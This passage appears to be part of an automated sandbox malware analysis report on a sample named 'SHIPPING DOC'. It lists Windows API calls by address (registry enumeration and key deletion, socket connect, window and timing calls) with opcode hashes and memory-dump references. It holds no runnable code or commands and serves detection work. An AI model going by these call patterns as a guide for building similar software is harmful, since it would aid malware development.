                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2832842796-0
                                                                                                                      • Opcode ID: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                                                                      • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                      • Opcode Fuzzy Hash: 30ee6bb99ff74686aae1268d80be9655946e1dc94406621de855fc36ffcf476c
                                                                                                                      • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2095303065-0
                                                                                                                      • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                      • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                      • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                      • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: RectWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 861336768-0
                                                                                                                      • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                      • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                      • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                      • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32 ref: 00449598
                                                                                                                        • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                      • _wcslen.LIBCMT ref: 0044960D
                                                                                                                      • _wcslen.LIBCMT ref: 0044961A
                                                                                                                      • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1856069659-0
                                                                                                                      • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                      • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                      • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                      • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                      • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                      • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                      • TrackPopupMenuEx.USER32(02E96510,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CursorMenuPopupTrack$Proc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1300944170-0
                                                                                                                      • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                      • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                      • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                      • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                      APIs
                                                                                                                      • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                      • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                      • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                      • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1822080540-0
                                                                                                                      • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                      • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                      • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                      • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                      • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 659298297-0
                                                                                                                      • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                      • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                      • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                      • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                      APIs
                                                                                                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                        • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(02E91AD0,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                        • Part of subcall function 00440D98: SendMessageW.USER32(02E91AD0,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableMessageSend$LongShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 142311417-0
                                                                                                                      • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                      • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                      • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                      • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                      • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                      • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                      • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                      • _wcslen.LIBCMT ref: 004458FB
                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3087257052-0
                                                                                                                      • Opcode ID: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                                                                      • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                      • Opcode Fuzzy Hash: f26ab1effd119969bc5c598581689495e0ac117966367203f6a60304a78e27fd
                                                                                                                      • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 004653FE
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00465481
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 245547762-0
                                                                                                                      • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                      • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                      • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                      • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                      APIs
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                      • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                      • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2338827641-0
                                                                                                                      • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                      • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                      • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                      • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                      • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2875609808-0
                                                                                                                      • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                      • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                      • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                      • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                      • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3741023627-0
                                                                                                                      • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                      • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                      • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                      • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
